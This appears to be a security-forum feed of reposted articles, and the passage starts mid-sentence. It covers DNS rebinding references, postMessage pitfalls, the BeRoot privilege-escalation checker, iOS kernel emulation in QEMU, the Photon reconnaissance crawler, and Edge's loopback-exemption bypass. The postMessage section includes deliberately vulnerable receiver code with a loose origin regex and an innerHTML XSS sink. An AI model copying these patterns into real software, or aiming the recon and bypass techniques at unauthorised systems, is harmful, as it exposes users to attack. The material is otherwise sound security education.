Newman for three months of helpful conversations leading towards her coverage of this research in WIRED. Mega-thanks to William Robertson for his help with this work, especially for letting me pwn his home network + Sonos device.
I’d also like to thank the security teams at both Roku and Sonos for their swift response in developing and deploying firmware updates to protect their users against DNS rebinding attacks. Below are a collection of DNS rebinding resources I’ve found useful in my research. You might too! Stanford’s Original DNS Rebinding Research (2007) DNS Rebinding with Robert RSnake Hansen (great video) CORS, the Frontendian Luke Young’s DEFCON 25 “Achieving Reliable DNS Rebinding” Ricky Lawshae’s DEFCON 19 SOAP & UPnP Talk UPnP Hacks website Dear developers, beware of DNS Rebinding Practical Attacks with DNS Rebinding Original Blizzard Game’s DNS rebinding bug report by Tavis Ormandy Brannon Dorsey Artist | Programmer | Researcher Sursa: https://medium.com/@brannondorsey/attacking-private-networks-from-the-internet-with-dns-rebinding-ea7098a2d325
5. The pitfalls of postMessage December 8, 2016 The postMessage API is an alternative to JSONP, XHR with CORS headers and other methods enabling sending data between origins. It was introduced with HTML5 and, like many other cross-document features, it can be a source of client-side vulnerabilities. How it works To send a message, an application simply calls the “postMessage” function on the target window it would like to send the message to: targetWindow.postMessage("hello other document!", "*"); And to receive a message, a “message” event handler can be registered on the receiving end: window.addEventListener("message", function(message){console.log(message.data)}); Pitfall 1 The first pitfall lies in the second argument of the “postMessage” function. This argument specifies which origin is allowed to receive the message. Using the wildcard “*” means that any origin is allowed to receive the message. Since the target window is located at a different origin, there is no way for the sender window to know if the target window is at the target origin when sending the message. If the target window has been navigated to another origin, the other origin would receive the data. Pitfall 2 The second pitfall lies on the receiving end. Since the listener listens for any message, an attacker could trick the application by sending a message from the attacker’s origin, which would make the receiver think it received the message from the sender’s window. To avoid this, the receiver must validate the origin of the message with the “message.origin” attribute. If regex is used to validate the origin, it’s important to escape the “.” character, since this code:

//Listener on http://www.examplereceiver.com/
window.addEventListener("message", function(message){
    if(/^http:\/\/www.examplesender.com$/.test(message.origin)){
        console.log(message.data);
    }
});

would not only allow messages from “www.examplesender.com“, but also “wwwaexamplesender.com“, “wwwbexamplesender.com” etc.
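One way to sidestep the regex footgun entirely (a sketch, not from the original post) is to compare message.origin against an explicit allow-list with strict equality:

```javascript
// Strict origin allow-list: with exact string comparison there is no
// unescaped "." or missing anchor that can accidentally widen the match.
const ALLOWED_ORIGINS = ["http://www.examplesender.com"];

function isAllowedOrigin(origin) {
  return ALLOWED_ORIGINS.includes(origin);
}

// In the browser, the listener would use it like this:
// window.addEventListener("message", function (message) {
//   if (!isAllowedOrigin(message.origin)) return; // drop untrusted messages
//   console.log(message.data);
// });
```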
Pitfall 3 The third pitfall is DOM XSS, caused by using the message in a way that makes the application treat it as HTML/script, for example:

//Listener on http://www.examplereceiver.com/
window.addEventListener("message", function(message){
    if(/^http:\/\/www\.examplesender\.com$/.test(message.origin)){
        document.getElementById("message").innerHTML = message.data;
    }
});

DOM XSS isn’t postMessage specific, but it’s something that’s present in many postMessage implementations. One reason for this could be that the receiving application expects the data to be formatted correctly, since it’s only listening for messages from http://www.examplesender.com/. But what if an attacker finds an XSS bug on http://www.examplesender.com/? That would mean that they could XSS http://www.examplereceiver.com/ as well. Not using postMessage? You might be thinking “our application doesn’t use postMessage so these issues don’t apply to us”. Well, a lot of third party scripts use postMessage to communicate with the third party service, so your application might be using postMessage without your knowledge. You can check if a page has a registered message listener (and which script registered it) by using Chrome Devtools, under Sources -> Global Listeners: Some third party scripts fall into these pitfalls. In the next post I will describe a postMessage vulnerability that caused XSS on over a million websites, and the technique I used to find it. References https://seclab.stanford.edu/websec/frames/post-message.pdf https://www.w3.org/TR/webmessaging/ http://caniuse.com/#feat=x-doc-messaging Author: Mathias Karlsson Security Researcher @avlidienbrunn Sursa: https://labs.detectify.com/2016/12/08/the-pitfalls-of-postmessage/
  6. Nytro

    test

  7. Nytro

    test

I talked to the person who made the plugin; he updated it and I re-enabled it. Can this still be reproduced?
  8. Nytro

    test

9. BeRoot Project BeRoot Project is a post-exploitation tool to check common misconfigurations in order to find a way to escalate privileges. It has been added to the pupy project as a post-exploitation module (so it will be executed in memory without touching the disk). This tool does not perform any exploitation. Its main goal is not to run a full configuration assessment of the host (listing all services, all processes, all network connections, etc.) but to print only the information that has been found to be a potential way to escalate privileges. This project works on Windows, Linux and Mac OS. You could find the Windows version here and the Linux and Mac OS one here. I recommend reading the README for the targeted OS to better understand what's happening. I tried to implement most techniques described in this picture: Enjoy Interesting projects Windows / Linux Local Privilege Escalation Workshop Linux tools Windows tools Sursa: https://github.com/AlessandroZ/BeRoot
  10. awesome-windows-kernel-security-development ❤️ windows kernel driver with c++ runtime https://github.com/wjcsharp/Common https://github.com/ExpLife/DriverSTL https://github.com/sysprogs/BazisLib https://github.com/AmrThabet/winSRDF https://github.com/sidyhe/dxx https://github.com/zer0mem/libc https://github.com/eladraz/XDK https://github.com/vic4key/Cat-Driver https://github.com/AndrewGaspar/km-stl https://github.com/zer0mem/KernelProject https://github.com/zer0mem/miniCommon https://github.com/jackqk/mystudy https://github.com/yogendersolanki91/Kernel-Driver-Example Full list: https://github.com/ExpLife0011/awesome-windows-kernel-security-development
11. Tutorial - emulate an iOS kernel in QEMU up to launchd and userspace Jul 21, 2018 I got launchd and recoveryd to start on an emulated iPhone running iOS 12 beta 4’s kernel using a modified QEMU. Here’s what I learned, and how you can try this yourself. Introduction This is Part 2 of a series on the iOS boot process. Part 1 is here. First, let me repeat: this is completely useless unless you’re really interested in iOS internals. If you want to run iOS, you should ask @CorelliumHQ instead, or just buy an iPhone. I’ve been interested in how iOS starts, so I’ve been trying to boot the iOS kernel in QEMU. I was inspired by @cmwdotme’s Corellium, a service which can boot any iOS in a virtual machine. Since I don’t have 9 years to build a perfect simulation of an iPhone, I decided to go for a less lofty goal: getting enough of iOS emulated until launchd, the first program to run when iOS boots, is able to start. Since last week’s post, I got the iOS 12 beta 4 kernel to fully boot in QEMU, and even got it to run launchd and start recoveryd from the restore ramdisk.
Here’s the output from the virtual serial port: iBoot version: corecrypto_kext_start called FIPSPOST_KEXT [64144875] fipspost_post:156: PASSED: (4 ms) - fipspost_post_integrity FIPSPOST_KEXT [64366750] fipspost_post:162: PASSED: (1 ms) - fipspost_post_hmac FIPSPOST_KEXT [64504187] fipspost_post:163: PASSED: (0 ms) - fipspost_post_aes_ecb FIPSPOST_KEXT [64659750] fipspost_post:164: PASSED: (0 ms) - fipspost_post_aes_cbc FIPSPOST_KEXT [72129500] fipspost_post:165: PASSED: (117 ms) - fipspost_post_rsa_sig FIPSPOST_KEXT [76481625] fipspost_post:166: PASSED: (67 ms) - fipspost_post_ecdsa FIPSPOST_KEXT [77264187] fipspost_post:167: PASSED: (11 ms) - fipspost_post_ecdh FIPSPOST_KEXT [77397875] fipspost_post:168: PASSED: (0 ms) - fipspost_post_drbg_ctr FIPSPOST_KEXT [77595812] fipspost_post:169: PASSED: (1 ms) - fipspost_post_aes_ccm FIPSPOST_KEXT [77765500] fipspost_post:171: PASSED: (1 ms) - fipspost_post_aes_gcm FIPSPOST_KEXT [77941875] fipspost_post:172: PASSED: (1 ms) - fipspost_post_aes_xts FIPSPOST_KEXT [78176875] fipspost_post:173: PASSED: (1 ms) - fipspost_post_tdes_cbc FIPSPOST_KEXT [78338625] fipspost_post:174: PASSED: (1 ms) - fipspost_post_drbg_hmac FIPSPOST_KEXT [78460125] fipspost_post:197: all tests PASSED (233 ms) AUC[<ptr>]::init(<ptr>) AUC[<ptr>]::probe(<ptr>, <ptr>) Darwin Image4 Validation Extension Version 1.0.0: Mon Jul 9 21:36:59 PDT 2018; root:AppleImage4-1.200.16~357/AppleImage4/RELEASE_ARM64 AppleCredentialManager: init: called, instance = <ptr>. ACMRM: init: called, ACMDRM_ENABLED=YES, ACMDRM_STATE_PUBLISHING_ENABLED=YES, ACMDRM_KEYBAG_OBSERVING_ENABLED=YES. ACMRM: _loadRestrictedModeForceEnable: restricted mode force-enabled = 0 . ACMRM-A: init: called, . ACMRM-A: _loadAnalyticsCollectionPeriod: analytics collection period = 86400 . ACMRM: _getDefaultStandardModeTimeout: default standard mode timeout = 604800 . ACMRM: _loadStandardModeTimeout: standard mode timeout = 604800 . 
ACMRM-A: notifyStandardModeTimeoutChanged: called, value = 604800 (modified = YES). ACMRM: _loadGracePeriodTimeout: device lock timeout = 3600 . ACMRM-A: notifyGracePeriodTimeoutChanged: called, value = 3600 (modified = YES). AppleCredentialManager: init: returning, result = true, instance = <ptr>. AUC[<ptr>]::start(<ptr>) AppleKeyStore starting (BUILT: Jul 9 2018 21:51:06) AppleSEPKeyStore::start: _sep_enabled = 1 AppleCredentialManager: start: called, instance = <ptr>. AppleCredentialManager: start: initializing power management, instance = <ptr>. AppleCredentialManager: start: started, instance = <ptr>. AppleCredentialManager: start: returning, result = true, instance = <ptr>. AppleARMPE::getGMTTimeOfDay can not provide time of day: RTC did not show up : apfs_module_start:1277: load: com.apple.filesystems.apfs, v748.200.53, 748.200.53.0.1, 2018/07/09 com.apple.AppleFSCompressionTypeZlib kmod start IOSurfaceRoot::installMemoryRegions() IOSurface disallowing global lookups apfs_sysctl_register:818: done registering sysctls. com.apple.AppleFSCompressionTypeZlib load succeeded L2TP domain init L2TP domain init complete PPTP domain init BSD root: md0, major 2, minor 0 apfs_vfsop_mountroot:1468: apfs: mountroot called! apfs_vfsop_mount:1231: unable to root from devvp <ptr> (root_device): 2 apfs_vfsop_mountroot:1472: apfs: mountroot failed, error: 2 hfs: mounted PeaceSeed16A5327f.arm64UpdateRamDisk on device b(2, 0) : : Darwin Bootstrapper Version 6.0.0: Mon Jul 9 00:39:56 PDT 2018; root:libxpc_executables-1336.200.86~25/launchd/RELEASE_ARM64 boot-args = debug=0x8 kextlog=0xfff cpus=1 rd=md0 Thu Jan 1 00:00:05 1970 localhost com.apple.xpc.launchd[1] <Notice>: Restore environment starting. If you would like to examine iOS’s boot process yourself, here’s how you can try it out. Building QEMU The emulation uses a patched copy of QEMU, which must be compiled from source. Install dependencies To compile QEMU, you first need to install some libraries. 
macOS: According to the QEMU wiki and the Homebrew recipe, you need to install Xcode and Homebrew, then run brew install pkg-config libtool jpeg glib pixman to install the required libraries to compile QEMU. Ubuntu 18.04: According to the QEMU wiki, run sudo apt install libglib2.0-dev libfdt-dev libpixman-1-dev zlib1g-dev libsdl1.2-dev to install the required libraries to compile QEMU. Windows: QEMU can be built on Windows, but their instructions don’t seem to work for this modified QEMU. Please build on macOS or Linux instead. You can set up a virtual machine running Ubuntu 18.04 with Virtualbox or VMWare Player. Download and build source Open a terminal, and run

git clone https://github.com/zhuowei/qemu.git
cd qemu
git submodule init
git submodule update
mkdir build-aarch64
cd build-aarch64
../configure --target-list=aarch64-softmmu
make -j4

Preparing iOS files for QEMU Once QEMU is compiled, you need to obtain the required iOS kernelcache, device tree, and ramdisk. If you don’t want to extract these files yourself, I packaged all the files you need from iOS 12 beta 4. You can download this archive if you sign up for my mailing list. If you want to extract your own files directly from an iOS update, here’s how: 1. Download the required files: Download my XNUQEMUScripts repository: git clone https://github.com/zhuowei/XNUQEMUScripts.git cd XNUQEMUScripts Download the iOS 12 beta 4 for iPhone X. To decompress the kernel, download newosxbook’s Joker tool. 2. Extract the kernel using Joker: ./joker.universal -dec ~/path/to/iphonex12b4/kernelcache.release.iphone10b mv /tmp/kernel kcache_out.bin Replace joker.universal with joker.ELF64 if you are using Linux. 3. Extract the ramdisk: dd if=~/path/to/iphonex12b4/048-22007-059.dmg bs=27 skip=1 of=ramdisk.dmg 4. Modify the devicetree.dtb file: python3 modifydevicetree.py ~/Path/To/iphonex12b4/Firmware/all_flash/DeviceTree.d22ap.im4p devicetree.dtb Installing a debugger You will also need lldb or gdb for arm64 installed.
macOS The version of lldb included in Xcode 9.3 should work. (Later versions should also work.) You don’t need to install anything in this step. Ubuntu 18.04 I can’t find an LLDB compatible with ARM64: neither the LLDB from the Ubuntu repository nor the version from LLVM’s own repos support ARM64. (Someone please build one!) Instead, you can use GDB on Linux. Two versions of GDB can be used: the version from devkitA64, or the Linaro GDB (recommended). Enter your xnuqemu directory (from the downloaded package or from the clone of the XNUQEMUScripts repo) Run ./linux_installgdb.sh to download the Linaro GDB. Running QEMU Place your qemu directory into the same directory as the scripts, kernel, devicetree, and ramdisk. You should have these files: ~/xnuqemu_dist$ ls README.md lldbit.sh devicetree.dtb lldbscript.lldb devicetreefromim4p.py modifydevicetree.py fixbootdelay_lldbscript_doc.txt qemu gdbit.sh ramdisk.dmg gdbscript.gdb readdevicetree.py kcache_out.bin runqemu.sh linux_installgdb.sh windows_installgdb.sh ./runqemu.sh to start QEMU. $ ./runqemu.sh QEMU 2.12.90 monitor - type 'help' for more information (qemu) xnu in a different terminal, ./lldbit.sh to start lldb, or if you’re using Linux, ./gdbit.sh to start gdb. $ ./lldbit.sh (lldb) target create "kcache_out.bin" Current executable set to 'kcache_out.bin' (arm64). (lldb) process connect --plugin gdb-remote connect://127.0.0.1:1234 (lldb) command source -s 0 'lldbscript.lldb' Executing commands in 'lldbscript.lldb'. (lldb) b *0xFFFFFFF007433BE8 Breakpoint 1: address = 0xfffffff007433be8 (lldb) breakpoint command add Enter your debugger command(s). Type 'DONE' to end. (lldb) b *0xFFFFFFF005FA5D84 Breakpoint 2: address = 0xfffffff005fa5d84 (lldb) breakpoint command add Enter your debugger command(s). Type 'DONE' to end. (lldb) b *0xfffffff00743e434 Breakpoint 3: address = 0xfffffff00743e434 (lldb) breakpoint command add Enter your debugger command(s). Type 'DONE' to end. 
(lldb) b *0xfffffff00743e834 Breakpoint 4: address = 0xfffffff00743e834 (lldb) Type c into lldb or gdb to start execution. In the terminal running QEMU, you should see boot messages. Congratulations, you’ve just run a tiny bit of iOS with a virtual iPhone! Or as UnthreadedJB would say, “#we r of #fakr!” What works Booting XNU all the way to running userspace programs Console output from virtual serial port What doesn’t work Wi-Fi Bluetooth USB Screen Internal storage Everything except the serial port You tell me Seriously, though, this only runs a tiny bit of iOS, and is nowhere close to iOS emulation. To borrow a simile from the creator of Corellium, if Corellium is a DeLorean time machine, then this is half a wheel at most. This experiment only finished the easy part of booting iOS, as it doesn’t emulate an iPhone at all, relying only on the parts common to all ARM devices. No drivers are loaded whatsoever, so there’s no emulation of the screen, the USB, the internal storage… You name it: it doesn’t work. For full iOS emulation, the next step would be reverse engineering the iPhone’s SoC to find out how its peripherals work. Unfortunately, that’s a 9-year project, as shown by the development history of Corellium. I can’t do that on my own - that’s why I wrote this tutorial! It’s my hope that this work inspires others to look into proper iOS emulation - from what I’ve seen, it’ll be a great learning experience. How I did this Last week, I started modifying QEMU to load an iOS kernel and device tree: the previous writeup is here. Here’s how I got from crashing when loading kernel modules to fully booting the kernel. Tweaking CPU emulation, part 3: Interrupting cow When we left off, the kernel crashed with a data abort when it tried to bzero a read-only region of memory. Why?
To confirm that it’s indeed writing to read-only memory, I implemented a command to dump out the kernel memory mappings, and enabled QEMU’s verbose MMU logging to detect changes to the memory map. I tracked down the crashing code to OSKext::updateLoadedKextSummaries. After every kext load, this code resets the kext summaries region to writable with vm_map_protect, writes information for the new kext, then sets the region back to read-only. The logs show that the call to protect the region modifies the memory mappings, but the call to reset it to read-write doesn’t do anything. Why isn’t it setting the page to writable? According to comments in vm_map_protect, it turns out that readonly->readwrite calls actually don’t change the protection immediately, but only sets it on-demand when a program tries - and fails - to write to the page. This is to implement copy on write. So, it seems the data abort exception is supposed to happen, but the panic is not. In the data abort exception, the page should be set to writable in arm_fast_fault. The code in open-source XNU can only return KERN_FAILURE or KERN_SUCCESS, but with a breakpoint, I saw it was returning KERN_PROTECTION_FAILURE. I checked the disassembly: yes, there’s extra code (0xFFFFFFF0071F953C in iOS 12 beta 4) returning KERN_PROTECTION_FAILURE if the page address doesn’t match one of the new KTRR registers added on the A11 processor . I had been ignoring all writes to KTRR registers, so this code can’t read the value from the register (which the kernel stored at startup), and believes that all addresses are invalid. Thus, instead of setting the page to writable, the kernel panics instead. I fixed this by adding these registers to QEMU’s virtual CPU, allowing the kernel to read and write them. After this change, a few more kexts started up, but the kernel then hangs… like it’s waiting for something. 
Connecting the timer interrupt My hunch for why the kernel hangs: one of the kexts tries to sleep for some time during initialization, but never wakes up because there are no timer interrupts, as shown by QEMU not logging any exceptions when it hangs. On ARM, there are two ways for hardware to signal the CPU: IRQ, shared by many devices, or FIQ, dedicated to just one device. QEMU’s virt machine hooks up the processor’s timer to IRQ, like most real ARM platforms. FIQ is usually reserved for debuggers. Apple, however, hooks up the timer directly to the FIQ. With virt’s timer hooked up to the wrong signal, the kernel would wait forever for an interrupt that would never come. All I had to do to get the timer working was to hook it up to FIQ. This gets me… a nice panic in the Image4 parser. Getting the Image4 parser module working panic(cpu 0 caller 0xfffffff006c1edb8): "could not instantiate ppl environment: 0x60"@/BuildRoot/Library/Caches/com.apple.xbs/Sources/AppleImage4/AppleImage4-1.200.12/include/abort.h:24 What does this mean? What’s error 0x60? I found the panic string, and looked for where the error message is generated. It turns out that the Image4 parser queries the device tree for various nodes in “/chosen” or “/default”; if the value doesn’t exist, it returns error 0x60. If the value is the wrong size, it returns 0x54. iOS’s device tree is missing two properties: chip-epoch and security-domain, which causes the module to panic with the 0x60 error. Oddly, the device tree doesn’t reserve extra space for these properties. I had to delete two existing properties to make space for them. With the modified device tree, the Image4 module initializes, but now I have a panic from a data abort in rorgn_lockdown. Failed attempt to get device drivers to not crash Of course the KTRR driver crashes when it tries to access the memory controller: there isn’t one! QEMU’s virt machine doesn’t have anything mapped at that address. 
Since I don’t have an emulation of the memory controller, I just added a block of empty memory to avoid the crash. This strategy didn’t work for the next crash, though, from the AppleInterruptController driver. That driver reads and validates values from the device, so just placing a blank block of memory causes the driver to panic. Something more drastic is needed if I don’t want to spend 9 years reverse engineering each driver. Driverless like we’re Waymo To boot XNU, I don’t really need all those drivers, do I? Who needs interrupts or the screen or power management or storage, anyways? All XNU needs to boot into userspace is a serial port and a timer. I disabled every other driver in the kernel. Drivers are loaded if their IONameMatch property corresponds to a device’s “compatible”, “name”, or “device_type” fields. To disable all the drivers, I erased every “compatible” property in the device tree, along with a few “name” and “device_type” properties. Now, with no drivers, XNU seems to hang, but after I patiently waited for a minute… Waiting on <dict ID="0"><key>IOProviderClass</key><string ID="1">IOMedia</string><key>Content</key><string ID="2">Apple_HFS</string></dict> Still waiting for root device It’s trying to mount the root filesystem! Loading a RAMDisk If it’s looking for a root filesystem, let’s give it one. I don’t have any drivers for storage, but I can mount an iOS Recovery RAMDisk, which requires no drivers. All I had to do was:

Load the ramdisk at the end of the kernel, just before the device tree blob
Put its address and size in the device tree so XNU can find it
Set the boot argument rd=md0 to boot from the ramdisk

hfs: mounted PeaceSeed16A5327f.arm64UpdateRamDisk on device b(2, 0) The kernel mounts the root filesystem! … but then hangs again. Using LLDB to patch out hanging functions By putting breakpoints all over bsd_init, I found that the kernel was hanging in IOBSDSecureRoot, when it tries to call the platform function.
The platform function looks for a device, but since I removed all the device drivers, it waits forever, in vain. To fix this, I just skipped the problematic call. I used an LLDB breakpoint to jump over the call and simulate a true return instead. And, after three weeks, the virtual serial port finally printed out: : : Darwin Bootstrapper Version 6.0.0: Mon Jul 9 00:39:56 PDT 2018; root:libxpc_executables-1336.200.86~25/launchd/RELEASE_ARM64 “Houston, the kernel has booted.” What I learned quirks of iOS memory management how iOS handles timer interrupts how iOS loads ramdisks building QEMU on different platforms modifying QEMU to add new CPU configuration registers differences between GDB and LLDB’s command syntax how to get people to subscribe to my mailing list. (muhahaha, one last signup link.) Thanks Thanks to everyone who shared or commented on my last article. To those who tried building and running it - sorry about taking so long to write up instructions! Thanks to @matteyeux, @h3adsh0tzz, @_th0ex, and @enzolovesbacon for testing the build instructions. Thanks to @winocm, whose darwin-on-arm project originally inspired me to learn about the XNU kernel. Sursa: https://worthdoingbadly.com/xnuqemu2/
  12. Nytro

    Photon

Photon Photon is a lightning fast web crawler which extracts URLs, files, intel & endpoints from a target. Yep, I am using 100 threads and Photon won't complain about it because it's in Ninja Mode. Why Photon? Not Your Regular Crawler Crawlers are supposed to recursively extract links, right? Well, that's kind of boring, so Photon goes beyond that. It extracts the following information: URLs (in-scope & out-of-scope) URLs with parameters (example.com/gallery.php?id=2) Intel (emails, social media accounts, amazon buckets etc.) Files (pdf, png, xml etc.) JavaScript files & Endpoints present in them The extracted information is saved in an organized manner. Intelligent Multi-Threading Here's a secret: most of the tools floating around on the internet aren't properly multi-threaded, even when they are supposed to be. They either supply a list of items to threads, which results in multiple threads accessing the same item, or they simply put a thread lock on everything and end up rendering multi-threading useless. But Photon is different, or should I say "genius"? Take a look at this and decide yourself. Ninja Mode In Ninja Mode, 3 online services are used to make requests to the target on your behalf. So basically, now you have 4 clients making requests to the same server simultaneously, which gives you a speed boost, minimizes the risk of connection reset, as well as delays requests from a single client. Here's a comparison generated by Quark where the lines represent threads: Usage

-u --url Specifies the URL to crawl. python photon.py -u http://example.com

-l --level Specifies how deep Photon should crawl. python photon.py -u http://example.com -l 3 Default Value: 2

-d --delay Specifies the delay between requests. python photon.py -u http://example.com -d 1 Default Value: 0

-t --threads The number of threads to use. python photon.py -u http://example.com -t 10 Default Value: 2

Note: The optimal number of threads depends on your connection speed as well as the nature of the target server.
If you have a decent network connection and the server doesn't have any rate limiting in place, you can use up to 100 threads.
-c --cookie
Cookie to send.
python photon.py -u http://example.com -c "PHPSSID=821b32d21"
-n --ninja
Toggles Ninja Mode on/off.
python photon.py -u http://example.com --ninja
Default Value: False
-s --seeds
Lets you add custom seeds, separated by commas.
python photon.py -u http://example.com -s "http://example.com/portals.html,http://example.com/blog/2018"

Contribution & License
Apart from reporting bugs and stuff, please help me add more "APIs" to make Ninja Mode more powerful. Photon is licensed under the GPL v3.0 license.

Sursa: https://github.com/s0md3v/Photon
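The multi-threading pitfall the Photon README calls out above (threads pulling the same item from a shared list, or one big lock serializing everything) is exactly what a thread-safe work queue avoids. Here is a minimal Python sketch of that idea; it is a generic illustration, not Photon's actual code, and the URLs are made up:

```python
import queue
import threading

# One thread-safe queue feeds all workers: each URL is handed to
# exactly one thread, with no per-item contention on a shared list.
work = queue.Queue()
for url in ("http://example.com/%d" % i for i in range(100)):
    work.put(url)

results = []
results_lock = threading.Lock()

def worker():
    while True:
        try:
            url = work.get_nowait()   # atomically claims one item
        except queue.Empty:
            return
        with results_lock:
            results.append(url)       # stand-in for the actual crawling

threads = [threading.Thread(target=worker) for _ in range(10)]
for t in threads:
    t.start()
for t in threads:
    t.join()

print(len(results), len(set(results)))  # 100 100 - every URL claimed exactly once
```

Because `Queue.get_nowait` is atomic, no two workers ever receive the same URL, and the only lock held is the short one around the shared results list.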
13. Sunday, 22 July 2018

UWP Localhost Network Isolation and Edge

This blog post describes an interesting “feature” added to Windows to support Edge accessing the loopback network interface. For reference, this was on Windows 10 1803 running Edge 42.17134.1.0, also verified on Windows 10 RS5 17713 running 43.17713.1000.0.

I like the concept of the App Container (AC) sandbox Microsoft introduced in Windows 8. It moved sandboxing on Windows from restricted tokens, which were hard to reason about and required massive kludges to get working, to a reasonably consistent capability-based model where you are heavily limited in what you can do unless you’ve been granted an explicit capability when your application is started. On Windows 8 this was limited to a small set of known capabilities. On Windows 10 this has been expanded massively by effectively allowing an application to define its own capabilities and enforce them through the normal Windows access control mechanisms.

I’ve been looking at AC more, and its ability to do network isolation, where access to the network requires being granted capabilities such as “internetClient”, seems very useful. It’s a little known fact that even in the most heavily locked down, restricted token sandbox it’s possible to open network sockets by accessing the raw AFD driver. AC solves this issue quite well: it doesn’t block access to the AFD driver; instead the firewall checks for the capabilities and blocks connecting or accepting sockets. One issue that does come up when building a generic sandboxing mechanism on this AC network isolation primitive is that, regardless of what capabilities you grant, it’s not possible for an AC application to access localhost. For example, you might want your sandboxed application to access a web server on localhost for testing, or use a localhost proxy to MITM the traffic. Neither of these scenarios can be made to work in an AC sandbox with capabilities alone.
The likely rationale for blocking localhost is that allowing sandboxed content such access can also be a big security risk: Windows runs quite a few services accessible locally which could be abused, such as the SMB server. Rather than adding a capability to grant access to localhost, there’s an explicit list of packages exempt from the localhost restriction, stored by the firewall service. You can access or modify this list using the Firewall APIs, such as the NetworkIsolationSetAppContainerConfig function, or using the CheckNetIsolation tool installed with Windows. This behavior seems to be rationalized as accessing loopback being a developer feature, not something which real applications should rely on.

Curious, I wondered whether I had ACs already in the exemption list. You can list all available exemptions by running “CheckNetIsolation LoopbackExempt -s” on the command line. On my Windows 10 machine we can see two exemptions already installed, which is odd for a developer feature which no applications should be using. The first entry shows “AppContainer NOT FOUND”, which indicates that the registered SID doesn’t correspond to a registered AC. The second entry shows a very unhelpful name of “001”, which at least means it’s an application on the current system. What’s going on? We can use my NtObjectManager PS module and its Get-NtSid cmdlet on the second SID to see if that can resolve a better name.

Ahha, “001” is actually a child AC of the Edge package. We could have guessed this by looking at the length of the SID: a normal AC SID has 8 sub-authorities, whereas a child has 12, with the extra 4 appended to the end of the base AC SID. Looking back at the unregistered SID, we can see it’s also an Edge AC SID, just with a child which isn’t actually registered. The “001” AC seems to be the one used to host Internet content, at least based on the browser security whitepaper from X41Sec (see page 54). This is not exactly surprising.
It seems when Edge was first released it wasn’t possible to access localhost resources at all (as demonstrated by an IBM help article which instructs the user to use CheckNetIsolation to add an exemption). However, at some point in development MS added an about:flags option to enable accessing localhost, and it seems it’s now the default configuration, even though, as you can see in the following screenshot, it says enabling it can put your device at risk.

What’s interesting, though, is that if you disable the flags option and restart Edge the exemption entry is deleted, and re-enabling it restores the entry again. Why is that a surprise? Well, based on previous knowledge of this exemption feature, such as this blog post by Eric Lawrence, you need admin privileges to change the exemption list. Perhaps MS have changed that behavior now? Let’s try to add an exemption using the CheckNetIsolation tool as a normal user, passing the “-a -p=SID” parameters. I guess they haven’t, as adding a new exemption using the CheckNetIsolation tool gives us access denied.

Now I’m really interested. With Edge being a built-in application, of course there are plenty of ways that MS could have fudged the “security” checks to allow Edge to add itself to the list, but where is it? The simplest location to add the fudge would be in the RPC service which implements NetworkIsolationSetAppContainerConfig. (How do I know there’s an RPC service? I just disassembled the API.) I took a guess and assumed the implementation would be hosted in the “Windows Defender Firewall” service, which is implemented in the MPSSVC DLL. The following is a simplified version of the RPC server method for the API.
HRESULT RPC_NetworkIsolationSetAppContainerConfig(handle_t handle,
                                                  DWORD dwNumPublicAppCs,
                                                  PSID_AND_ATTRIBUTES appContainerSids) {
    if (!FwRpcAPIsIsPackageAccessGranted(handle)) {
        HRESULT hr;
        BOOL developer_mode = FALSE;
        IsDeveloperModeEnabled(&developer_mode);
        if (developer_mode) {
            hr = FwRpcAPIsSecModeAccessCheckForClient(1, handle);
            if (FAILED(hr)) {
                return hr;
            }
        } else {
            hr = FwRpcAPIsSecModeAccessCheckForClient(2, handle);
            if (FAILED(hr)) {
                return hr;
            }
        }
    }
    return FwMoneisAppContainerSetConfig(dwNumPublicAppCs, appContainerSids);
}

What’s immediately obvious is there’s a method call, FwRpcAPIsIsPackageAccessGranted, which has “Package” in the name, which might indicate it’s inspecting some AC package information. If this call succeeds, then the following security checks are bypassed and the real function FwMoneisAppContainerSetConfig is called. It’s also worth noting that the security checks differ depending on whether you’re in developer mode or not. It turns out that if you have developer mode enabled then you can also bypass the admin check, which is confirmation the exemption list was designed primarily as a developer feature. Anyway, let’s take a look at FwRpcAPIsIsPackageAccessGranted to see what it’s checking.

const WCHAR* allowedPackageFamilies[] = {
    L"Microsoft.MicrosoftEdge_8wekyb3d8bbwe",
    L"Microsoft.MicrosoftEdgeBeta_8wekyb3d8bbwe",
    L"Microsoft.zMicrosoftEdge_8wekyb3d8bbwe"
};

HRESULT FwRpcAPIsIsPackageAccessGranted(handle_t handle) {
    HANDLE token;
    FwRpcAPIsGetAccessTokenFromClientBinding(handle, &token);

    WCHAR* package_id;
    RtlQueryPackageIdentity(token, &package_id);

    WCHAR family_name[0x100];
    PackageFamilyNameFromFullName(package_id, family_name);

    for (int i = 0; i < _countof(allowedPackageFamilies); ++i) {
        if (wcsicmp(family_name, allowedPackageFamilies[i]) == 0) {
            return S_OK;
        }
    }
    return E_FAIL;
}

The FwRpcAPIsIsPackageAccessGranted function gets the caller’s token, queries for the package family name and then checks it against a hard-coded list.
If the caller is in the Edge package (or some beta versions), the function returns success, which results in the admin check being bypassed. The conclusion we can draw is that this is how Edge adds itself to the exemption list, although we also want to check what access is required to reach the RPC server. For an ALPC server there are two security checks: connecting to the ALPC port, and an optional security callback. We could reverse engineer this from the service binary, but it is easier just to dump it from the ALPC server port; again we can use my NtObjectManager module. As the RPC service doesn’t specify a name for the service, the RPC libraries generate a random name of the form “LRPC-XXXXX”. You would usually use EPMAPPER to find the real name, but I just used a debugger on CheckNetIsolation, broke on NtAlpcConnectPort and dumped the connection name. Then we just find the handle to that ALPC port in the service process and dump its security descriptor. The list contains Everyone and all the various network-related capabilities, so any AC process with network access can talk to these APIs, including Edge LPAC. Therefore all Edge processes can access this capability and add arbitrary packages. The implementation inside Edge is in the function emodel!SetACLoopbackExemptions. With this knowledge we can now put together some code which will exploit this “feature” to add arbitrary exemptions. You can find the PowerShell script in my Github gist.

Wrap Up

If I was willing to speculate (and I am), I’d say the reason that MS added localhost access this way is that it didn’t require modifying kernel drivers; it could all be done with changes to user-mode components. Of course the cynic in me thinks this could actually be just there to make Edge more equal than others, assuming MS ever allowed another web browser in the App Store. Even a wrapper around the Edge renderer would not be allowed to add the localhost exemption.
It’d be nice to see MS add a capability to do this in the future, but considering current RS5 builds use this same approach, I’m not hopeful. Is this a security issue? Well, that depends. On the one hand, you could argue that the default configuration, which allows Internet-facing content to then access localhost, is dangerous in itself; they point that out explicitly in the about:flags entry. Then again, all browsers have this behavior, so I’m not sure it’s really an issue. The implementation is pretty sloppy and I’m shocked (well, not that shocked) that it passed a security review. To list some of the issues with it:
